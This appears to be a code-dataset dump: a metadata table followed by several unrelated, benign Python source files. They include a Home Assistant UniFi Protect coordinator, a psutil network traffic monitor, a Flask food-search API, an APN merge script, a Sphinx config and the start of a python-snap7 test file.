hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a20e816ce2fa0b8d7e36effab5c2be3e0a1a12b | 8,042 | py | Python | homeassistant/components/unifiprotect/data.py | mib1185/core | b17d4ac65cde9a27ff6032d70b148792e5eba8df | [
"Apache-2.0"
] | null | null | null | homeassistant/components/unifiprotect/data.py | mib1185/core | b17d4ac65cde9a27ff6032d70b148792e5eba8df | [
"Apache-2.0"
] | null | null | null | homeassistant/components/unifiprotect/data.py | mib1185/core | b17d4ac65cde9a27ff6032d70b148792e5eba8df | [
"Apache-2.0"
] | null | null | null | """Base class for protect data."""
from __future__ import annotations
from collections.abc import Callable, Generator, Iterable
from datetime import timedelta
import logging
from typing import Any
from pyunifiprotect import ProtectApiClient
from pyunifiprotect.data import (
Bootstrap,
Event,
Liveview,
ModelType,
ProtectAdoptableDeviceModel,
ProtectModelWithId,
WSSubscriptionMessage,
)
from pyunifiprotect.exceptions import ClientError, NotAuthorized
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.event import async_track_time_interval
from .const import CONF_DISABLE_RTSP, DEVICES_THAT_ADOPT, DEVICES_WITH_ENTITIES, DOMAIN
from .utils import async_get_devices, async_get_devices_by_type
_LOGGER = logging.getLogger(__name__)
@callback
def async_last_update_was_successful(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Check if the last update was successful for a config entry."""
return bool(
DOMAIN in hass.data
and entry.entry_id in hass.data[DOMAIN]
and hass.data[DOMAIN][entry.entry_id].last_update_success
)
class ProtectData:
"""Coordinate updates."""
def __init__(
self,
hass: HomeAssistant,
protect: ProtectApiClient,
update_interval: timedelta,
entry: ConfigEntry,
) -> None:
"""Initialize an subscriber."""
super().__init__()
self._hass = hass
self._entry = entry
self._hass = hass
self._update_interval = update_interval
self._subscriptions: dict[str, list[Callable[[ProtectModelWithId], None]]] = {}
self._unsub_interval: CALLBACK_TYPE | None = None
self._unsub_websocket: CALLBACK_TYPE | None = None
self.last_update_success = False
self.api = protect
@property
def disable_stream(self) -> bool:
"""Check if RTSP is disabled."""
return self._entry.options.get(CONF_DISABLE_RTSP, False)
def get_by_types(
self, device_types: Iterable[ModelType]
) -> Generator[ProtectAdoptableDeviceModel, None, None]:
"""Get all devices matching types."""
for device_type in device_types:
yield from async_get_devices_by_type(
self.api.bootstrap, device_type
).values()
async def async_setup(self) -> None:
"""Subscribe and do the refresh."""
self._unsub_websocket = self.api.subscribe_websocket(
self._async_process_ws_message
)
await self.async_refresh()
async def async_stop(self, *args: Any) -> None:
"""Stop processing data."""
if self._unsub_websocket:
self._unsub_websocket()
self._unsub_websocket = None
if self._unsub_interval:
self._unsub_interval()
self._unsub_interval = None
await self.api.async_disconnect_ws()
async def async_refresh(self, *_: Any, force: bool = False) -> None:
"""Update the data."""
# if last update was failure, force until success
if not self.last_update_success:
force = True
try:
updates = await self.api.update(force=force)
except NotAuthorized:
await self.async_stop()
_LOGGER.exception("Reauthentication required")
self._entry.async_start_reauth(self._hass)
self.last_update_success = False
except ClientError:
if self.last_update_success:
_LOGGER.exception("Error while updating")
self.last_update_success = False
# manually trigger update to mark entities unavailable
self._async_process_updates(self.api.bootstrap)
else:
self.last_update_success = True
self._async_process_updates(updates)
@callback
def _async_process_ws_message(self, message: WSSubscriptionMessage) -> None:
# removed packets are not processed yet
if message.new_obj is None or not getattr(
message.new_obj, "is_adopted_by_us", True
):
return
if message.new_obj.model in DEVICES_WITH_ENTITIES:
self._async_signal_device_update(message.new_obj)
# trigger update for all Cameras with LCD screens when NVR Doorbell settings updates
if "doorbell_settings" in message.changed_data:
_LOGGER.debug(
"Doorbell messages updated. Updating devices with LCD screens"
)
self.api.bootstrap.nvr.update_all_messages()
for camera in self.api.bootstrap.cameras.values():
if camera.feature_flags.has_lcd_screen:
self._async_signal_device_update(camera)
# trigger updates for camera that the event references
elif isinstance(message.new_obj, Event):
if message.new_obj.camera is not None:
self._async_signal_device_update(message.new_obj.camera)
elif message.new_obj.light is not None:
self._async_signal_device_update(message.new_obj.light)
elif message.new_obj.sensor is not None:
self._async_signal_device_update(message.new_obj.sensor)
# alert user viewport needs restart so voice clients can get new options
elif len(self.api.bootstrap.viewers) > 0 and isinstance(
message.new_obj, Liveview
):
_LOGGER.warning(
"Liveviews updated. Restart Home Assistant to update Viewport select options"
)
@callback
def _async_process_updates(self, updates: Bootstrap | None) -> None:
"""Process update from the protect data."""
# Websocket connected, use data from it
if updates is None:
return
self._async_signal_device_update(self.api.bootstrap.nvr)
for device in async_get_devices(self.api.bootstrap, DEVICES_THAT_ADOPT):
self._async_signal_device_update(device)
@callback
def async_subscribe_device_id(
self, device_id: str, update_callback: Callable[[ProtectModelWithId], None]
) -> CALLBACK_TYPE:
"""Add an callback subscriber."""
if not self._subscriptions:
self._unsub_interval = async_track_time_interval(
self._hass, self.async_refresh, self._update_interval
)
self._subscriptions.setdefault(device_id, []).append(update_callback)
def _unsubscribe() -> None:
self.async_unsubscribe_device_id(device_id, update_callback)
return _unsubscribe
@callback
def async_unsubscribe_device_id(
self, device_id: str, update_callback: Callable[[ProtectModelWithId], None]
) -> None:
"""Remove a callback subscriber."""
self._subscriptions[device_id].remove(update_callback)
if not self._subscriptions[device_id]:
del self._subscriptions[device_id]
if not self._subscriptions and self._unsub_interval:
self._unsub_interval()
self._unsub_interval = None
@callback
def _async_signal_device_update(self, device: ProtectModelWithId) -> None:
"""Call the callbacks for a device_id."""
device_id = device.id
if not self._subscriptions.get(device_id):
return
_LOGGER.debug("Updating device: %s", device_id)
for update_callback in self._subscriptions[device_id]:
update_callback(device)
@callback
def async_ufp_instance_for_config_entry_ids(
hass: HomeAssistant, config_entry_ids: set[str]
) -> ProtectApiClient | None:
"""Find the UFP instance for the config entry ids."""
domain_data = hass.data[DOMAIN]
for config_entry_id in config_entry_ids:
if config_entry_id in domain_data:
protect_data: ProtectData = domain_data[config_entry_id]
return protect_data.api
return None
| 36.889908 | 96 | 0.664014 |
4a20e82e2f810edf5c4daf3e1e45cc6ab5cd2dc9 | 307 | py | Python | pash/actions/del_pass.py | simon8889/PASH | 23728f12d5f033615d52d32006c086ee876ea4b1 | [
"MIT"
] | 2 | 2021-02-26T01:57:53.000Z | 2021-02-26T01:57:55.000Z | pash/actions/del_pass.py | simon8889/PASH | 23728f12d5f033615d52d32006c086ee876ea4b1 | [
"MIT"
] | null | null | null | pash/actions/del_pass.py | simon8889/PASH | 23728f12d5f033615d52d32006c086ee876ea4b1 | [
"MIT"
] | null | null | null | from pash.actions.main import DbActions
class DelPass(DbActions):
def __init__(self, _id):
super().__init__()
self.id = _id
def delele(self):
try:
self.collection.delete_one({"_id": self.id})
return True
except:
return False | 23.615385 | 56 | 0.557003 |
4a20e87a6076968322c9c949d723e077f48e5b7a | 818 | py | Python | WeatherRanger/WeatherRangerProject/migrations/0003_auto_20170227_2111.py | mgoldbas/WeatherRanger | 6322d5fe0064f443687b0f68a50b15e290da02c0 | [
"MIT"
] | null | null | null | WeatherRanger/WeatherRangerProject/migrations/0003_auto_20170227_2111.py | mgoldbas/WeatherRanger | 6322d5fe0064f443687b0f68a50b15e290da02c0 | [
"MIT"
] | null | null | null | WeatherRanger/WeatherRangerProject/migrations/0003_auto_20170227_2111.py | mgoldbas/WeatherRanger | 6322d5fe0064f443687b0f68a50b15e290da02c0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-27 21:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('WeatherRangerProject', '0002_auto_20170226_0109'),
]
operations = [
migrations.AlterField(
model_name='temperaturerange',
name='is_in_five_day_range',
field=models.NullBooleanField(),
),
migrations.AlterField(
model_name='temperaturerange',
name='is_in_range',
field=models.NullBooleanField(),
),
migrations.AlterField(
model_name='temperaturerange',
name='is_in_sixteen_day_range',
field=models.NullBooleanField(),
),
]
| 26.387097 | 60 | 0.608802 |
4a20e910a249d6877b65949adc1780099e47dcb7 | 326 | py | Python | tests/test_main.py | znhv/winsio | 4d4e69961285ea3dcebc5ad6358e2d753d6b4f9d | [
"MIT"
] | null | null | null | tests/test_main.py | znhv/winsio | 4d4e69961285ea3dcebc5ad6358e2d753d6b4f9d | [
"MIT"
] | null | null | null | tests/test_main.py | znhv/winsio | 4d4e69961285ea3dcebc5ad6358e2d753d6b4f9d | [
"MIT"
] | null | null | null | from brainstorm.__main__ import main, get_stats, get_out
from brainstorm.utils.menu import MainMenu
def test_stats(capsys):
text = """ Player: None
Score : 0
"""
get_stats()
captured = capsys.readouterr()
assert captured.out == text
def test_exit():
actual = get_out()
assert actual is True
| 16.3 | 56 | 0.677914 |
4a20ea581e4f3a8df4839d810f8efa475b0af108 | 6,047 | py | Python | network_monitor.py | Mnikley/network-traffic-monitor | 3c77d5c556df415fb5f993e9acfe36866ce0054f | [
"MIT"
] | null | null | null | network_monitor.py | Mnikley/network-traffic-monitor | 3c77d5c556df415fb5f993e9acfe36866ce0054f | [
"MIT"
] | null | null | null | network_monitor.py | Mnikley/network-traffic-monitor | 3c77d5c556df415fb5f993e9acfe36866ce0054f | [
"MIT"
] | null | null | null | import time
import psutil
from functools import partial
from pynput.keyboard import Listener, Key, KeyCode
import fire
from datetime import datetime as dt
import sys
if sys.platform == "win32":
import pygetwindow as gw
def to_mb(val, update_interval=None):
"""Convert bytes to MB with 2 decimals"""
tmp = 1
if update_interval:
tmp = 1/update_interval
return "{:0.2f}".format((val / 1024 / 1024) * tmp)
def show_stats(first_timestamp: float = None, interim_timestamp: float = None,
first_data: psutil._common.snetio = None, interim_data: psutil._common.snetio = None,
cent: int = None, text: str = None, last_data: psutil._common.snetio = None):
"""Function called when pressing esc, q, space or s"""
if text == "END STATISTICS":
_ts = first_timestamp
_data = first_data
elif text == "INTERIM STATISTICS":
_ts = interim_timestamp
_data = interim_data
time_diff = time.strftime("%H:%M:%S", time.gmtime(time.time() - _ts))
total_in = to_mb(last_data.bytes_recv - _data.bytes_recv)
total_out = to_mb(last_data.bytes_sent - _data.bytes_sent)
if text == "END STATISTICS":
print("\n" + text.center(57 + cent, "*"))
print(f"{'DURATION'.center(cent)}|{'RECEIVED [MB]'.center(24)}|{'TRANSMITTED [MB]'.center(30)}")
print("-" * (57+cent))
print(f"{time_diff.center(cent)}|{total_in.center(24)}|{total_out.center(30)}")
print("*" * (57 + cent))
elif text == "INTERIM STATISTICS":
tmp = " elapsed: " + time_diff + " | received: " + total_in + " MB | sent: " + total_out + " MB "
print("\n" + tmp.center(57 + cent, "*"))
def on_press_release(event):
"""Function for both (key down & key up) events"""
global esc_pressed, space_pressed
# check if window is active to prohibit global hotkeys (windows only)
if sys.platform == "win32":
if "network_monitor" not in gw.getActiveWindowTitle():
return
if event == Key.esc or event == KeyCode.from_char("q"):
esc_pressed = True
if event == Key.space or event == KeyCode.from_char("s"):
space_pressed = True
def run(lan_name="WiFi", update_interval=1, log=False):
"""Runs the network monitor
Parameters
----------
lan_name : string
Name of the network connection
update_interval : int or float
Update interval
log : bool
Log results to file
"""
global space_pressed
# lan objects
lo = partial(psutil.net_io_counters, pernic=True, nowrap=True)
# prohibit invalid lan names
available_objs = lo().keys()
if len(available_objs) == 0:
print("No Network adapters available.")
return
if lan_name not in available_objs:
tmp = "', '".join(available_objs)
fallback_connection = None
for f in list(available_objs):
if f.lower().startswith("eth"):
fallback_connection = f
if not fallback_connection:
fallback_connection = list(available_objs)[0]
print(f"Connection '{lan_name}' not available in: '{tmp}'. Using '{fallback_connection}' instead."
f" Use --lan_name='NAME' to change adapter manually.")
lan_name = fallback_connection
# centering variable
if update_interval < 1:
cent = 12
else:
cent = 10
print_header = True
first_data, interim_data = lo()[lan_name], lo()[lan_name]
first_timestamp, interim_timestamp = time.time(), time.time()
log_file_name = dt.now().strftime("network_traffic_%y-%m-%d_%H-%M-%S.log")
while True:
if esc_pressed:
show_stats(first_timestamp=first_timestamp, first_data=first_data,
cent=cent, text="END STATISTICS", last_data=lo()[lan_name])
break
if space_pressed:
show_stats(interim_timestamp=interim_timestamp, interim_data=interim_data,
cent=cent, text="INTERIM STATISTICS", last_data=lo()[lan_name])
interim_timestamp = time.time()
interim_data = lo()[lan_name]
space_pressed = False
# two timestamps to measure diff
ts_one = lo()[lan_name]
time.sleep(update_interval)
ts_two = lo()[lan_name]
net_in = to_mb(ts_two.bytes_recv - ts_one.bytes_recv, update_interval)
net_out = to_mb(ts_two.bytes_sent - ts_one.bytes_sent, update_interval)
if print_header:
print("NETWORK MONITOR".center(57+cent, "*"))
print(f"{'TIMESTAMP'.center(cent)}| IN [MB/s] | OUT [MB/s] | TOTAL IN [MB] | TOTAL OUT [MB]")
print("-" * (57+cent))
print_header = False
if log:
with open(log_file_name, mode="a") as f:
f.write("LOG START".center(57+cent, "*") + "\n" + "TIMESTAMP\tIN [MB/s]\tOUT [MB/s]\t"
"TOTAL IN [MB]\tTOTAL OUT [MB]\n")
if update_interval < 1:
tmp_time = dt.now().strftime("%H:%M:%S:%f")[:-4]
else:
tmp_time = time.strftime("%H:%M:%S")
# status
status = f"{tmp_time.center(cent)}| {net_in.center(9)} | {net_out.center(10)} | " \
f"{to_mb(ts_two.bytes_recv).center(13)} | {to_mb(ts_two.bytes_sent).center(14)}"
print(status, end="\r")
if log:
with open(log_file_name, mode="a") as f:
f.write(status.replace("|", "\t") + "\n")
if __name__ == "__main__":
esc_pressed = False
space_pressed = False
# key-listenera
listener = Listener(on_press=None, on_release=on_press_release)
listener.start()
# run network monitor
fire.Fire(run)
# join threads
listener.stop()
listener.join()
input("Exit with any key..")
| 35.362573 | 107 | 0.58128 |
4a20eb8bab13bc16538ad26bb12b95bec50c467a | 8,789 | py | Python | docs/conf.py | gousaiyang/python-prompt-toolkit | 6237764658214af4c24633795d2571d2bd03375d | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | gousaiyang/python-prompt-toolkit | 6237764658214af4c24633795d2571d2bd03375d | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | gousaiyang/python-prompt-toolkit | 6237764658214af4c24633795d2571d2bd03375d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# prompt_toolkit documentation build configuration file, created by
# sphinx-quickstart on Thu Jul 31 14:17:08 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.graphviz"]
# Add any paths that contain templates here, relative to this directory.
# templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "prompt_toolkit"
copyright = "2014-2020, Jonathan Slenders"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "3.0.22"
# The full version, including alpha/beta/rc tags.
release = "3.0.22"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if on_rtd:
html_theme = "default"
else:
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
html_theme = "pyramid"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "images/logo_400px.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "prompt_toolkitdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
"index",
"prompt_toolkit.tex",
"prompt_toolkit Documentation",
"Jonathan Slenders",
"manual",
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
"index",
"prompt_toolkit",
"prompt_toolkit Documentation",
["Jonathan Slenders"],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
"index",
"prompt_toolkit",
"prompt_toolkit Documentation",
"Jonathan Slenders",
"prompt_toolkit",
"One line description of project.",
"Miscellaneous",
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
| 30.838596 | 79 | 0.701104 |
4a20ec46443f08b2c082a8afd7163302ec1a34d9 | 2,070 | py | Python | macronizer_cores/food_item_api/routes.py | triethuynh2301/macronizer-project | b4cd234de603abc8f588c143ac1fdf56063390c5 | [
"MIT"
] | null | null | null | macronizer_cores/food_item_api/routes.py | triethuynh2301/macronizer-project | b4cd234de603abc8f588c143ac1fdf56063390c5 | [
"MIT"
] | null | null | null | macronizer_cores/food_item_api/routes.py | triethuynh2301/macronizer-project | b4cd234de603abc8f588c143ac1fdf56063390c5 | [
"MIT"
] | null | null | null | from flask import request, jsonify, Blueprint
from flask_login import login_required
from macronizer_cores import db
from macronizer_cores.models import FoodItem
from config import CALORIES_NINJA_API_KEY
import requests
# create blueprint
food_item_api = Blueprint('food_item_api', __name__)
# SECTION - routes
@food_item_api.route("/api/food/search")
@login_required
def search_food_item():
'''
GET /api/food/search/<string:query_string>
----------------------------------------------------------------
- Search for food in CaloriesNinja using query string from client
Returns
--------------
List of food items in JSON format
'''
api_url = 'https://api.calorieninjas.com/v1/nutrition?query='
query_string = request.args.get('queryString')
response = requests.get(api_url + query_string, headers={'X-Api-Key': CALORIES_NINJA_API_KEY})
if response.status_code == requests.codes.ok:
# json() returns a JSON object of the result -> return payload data to JSON
return response.json()
else:
# TODO - add error handling
print("Error:", response.status_code, response.text)
res = jsonify({"message": "Request failed"})
return res
@food_item_api.route("/api/food/delete/<int:food_id>", methods=["DELETE"])
@login_required
def delete_food_item_from_log(food_id):
'''
DELETE /api/food/delete/<int:food_id>
----------------------------------------------------------------
- Delete a food item from db using item id
Parameters
--------------
food_id: int
Id of the item to be deleted
Returns
--------------
Food item deleted in JSON format and status code 204
'''
item_to_delete = FoodItem.query.get_or_404(food_id)
try:
db.session.delete(item_to_delete)
db.session.commit()
# jsonify() turn dict into json format
res = jsonify(log=item_to_delete.serialize())
return (res, 204)
except:
res = {"message": "Server Error"}
return (res, 500)
| 29.15493 | 98 | 0.620773 |
4a20ecb4968b01282916f61ce6d6c0502cdd180f | 2,475 | py | Python | tools/custom_apns.py | fusionos-next/android_vendor_fuse | 474ff700385df7a557cbdbcd9da28125625fe7f9 | [
"Apache-2.0"
] | null | null | null | tools/custom_apns.py | fusionos-next/android_vendor_fuse | 474ff700385df7a557cbdbcd9da28125625fe7f9 | [
"Apache-2.0"
] | null | null | null | tools/custom_apns.py | fusionos-next/android_vendor_fuse | 474ff700385df7a557cbdbcd9da28125625fe7f9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (C) 2018 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from xml.dom.minidom import parseString
def main(argv):
reload(sys)
sys.setdefaultencoding('utf8')
original_file = 'vendor/fuse/prebuilt/common/etc/apns-conf.xml'
if len(argv) == 3:
output_file_path = argv[1]
custom_override_file = argv[2]
else:
raise ValueError("Wrong number of arguments %s" % len(argv))
custom_apn_names = []
with open(custom_override_file, 'r') as f:
for line in f:
xmltree = parseString(line)
carrier = xmltree.getElementsByTagName('apn')[0].getAttribute('carrier')
custom_apn_names.append(carrier)
with open(original_file, 'r') as input_file:
with open(output_file_path, 'w') as output_file:
for line in input_file:
writeOriginalLine = True
for apn in custom_apn_names:
if apn in line:
with open(custom_override_file, 'r') as custom_file:
for override_line in custom_file:
if apn in override_line:
output_file.write(override_line)
writeOriginalLine = False
custom_apn_names.remove(apn)
if writeOriginalLine:
if "</apns>" in line:
if custom_apn_names:
for apn in custom_apn_names:
with open(custom_override_file, 'r') as custom_file:
for override_line in custom_file:
if apn in override_line:
output_file.write(override_line)
output_file.write(line)
if __name__ == '__main__':
main(sys.argv)
| 39.285714 | 84 | 0.577778 |
4a20ed377365f29887a6be29259222bfb23b120f | 3,520 | py | Python | scripts/extract_spines.py | FilippoC/emnlp2017 | 766f12ac47fdf3f83531068de146998d420901f9 | [
"MIT"
] | null | null | null | scripts/extract_spines.py | FilippoC/emnlp2017 | 766f12ac47fdf3f83531068de146998d420901f9 | [
"MIT"
] | null | null | null | scripts/extract_spines.py | FilippoC/emnlp2017 | 766f12ac47fdf3f83531068de146998d420901f9 | [
"MIT"
] | null | null | null | #!/bin/python3
import sys
import discodop.treebank
import discodop.heads
treebank_path = sys.argv[1]
headrules_path = sys.argv[2]
reader = discodop.treebank.NegraCorpusReader(treebank_path)
trees = reader.trees()
sentences = reader.sents()
headrules = discodop.heads.readheadrules(headrules_path)
def extract_spines(tree, radj=True):
node_level = {}
node_allow_r_adj = {}
node_projection = {}
for subtree in tree.subtrees(lambda n: n and not isinstance(n[0], discodop.treebank.Tree)):
subtree_save = subtree
# check if this is correct for computing the word index
#projection = tree.leaves().index(subtree[0]) + 1
projection = subtree[0] + 1
level = 0
#node_level[subtree.treeposition] = level
node_projection[subtree.treeposition] = projection
previous_label = subtree.label
while discodop.heads.ishead(subtree):
subtree = subtree.parent
if previous_label != subtree.label or not radj:
level += 1
previous_label = subtree.label
node_allow_r_adj[subtree.treeposition] = False
else:
node_allow_r_adj[subtree.treeposition] = True
node_level[subtree.treeposition] = level - 1 # minus because Carreras did not count the POS
node_projection[subtree.treeposition] = projection
previous_label = subtree.label
spines = []
for subtree in tree.subtrees(lambda n: n and not isinstance(n[0], discodop.treebank.Tree)):
p = subtree.treeposition
spine = {
"id": node_projection[p],
"pos": subtree.label,
"template": "*",
"head": 0,
"att_position": 0,
"att_type": "s"
}
previous_label = subtree.label
while discodop.heads.ishead(subtree):
subtree = subtree.parent
if subtree.treeposition == ():
break
if previous_label != subtree.label or not radj:
spine["template"] += "+" + subtree.label
previous_label = subtree.label
if subtree.parent is not None:
parent = subtree.parent
parent_p = subtree.parent.treeposition
spine["head"] = node_projection[parent_p]
spine["att_position"] = node_level[parent_p]
if radj and node_allow_r_adj[parent_p] and \
(
(subtree.right_sibling is not None and discodop.heads.ishead(subtree.right_sibling))
or
(subtree.left_sibling is not None and discodop.heads.ishead(subtree.left_sibling))
):
spine["att_type"] = "r"
spines.append(spine)
return spines
for k in trees:
discodop.heads.applyheadrules(trees[k], headrules)
for k in trees:
tree = trees[k]
sentence = sentences[k]
spines = extract_spines(tree)
spines.sort(key=lambda s: s["id"])
for spine in spines:
print("%i\t%s\t%s\t%s\t%i\t%s\t%s"%(
spine["id"],
sentence[spine["id"] - 1],
spine["pos"],
spine["template"],
spine["head"],
spine["att_position"] if spine["head"] != 0 else 0,
spine["att_type"] if spine["head"] != 0 else "s"
))
print()
| 30.608696 | 104 | 0.559659 |
4a20eea414b6f04ccdba180d9d15d121f9f57f8f | 17,597 | py | Python | test/test_client.py | openarchitect/python-snap7 | 9adc3bcc542729f96dab0b84ce4da11543952da9 | [
"MIT"
] | null | null | null | test/test_client.py | openarchitect/python-snap7 | 9adc3bcc542729f96dab0b84ce4da11543952da9 | [
"MIT"
] | null | null | null | test/test_client.py | openarchitect/python-snap7 | 9adc3bcc542729f96dab0b84ce4da11543952da9 | [
"MIT"
] | null | null | null | import ctypes
import struct
import unittest
import logging
import time
import mock
from datetime import datetime
from subprocess import Popen
from os import path, kill
import snap7
from snap7.snap7exceptions import Snap7Exception
from snap7.snap7types import S7AreaDB, S7WLByte, S7DataItem
from snap7 import util
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 1
slot = 1
class TestClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
server_path = path.join(path.dirname(path.realpath(snap7.__file__)),
"bin/snap7-server.py")
cls.server_pid = Popen([server_path]).pid
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
kill(cls.server_pid, 1)
def setUp(self):
self.client = snap7.client.Client()
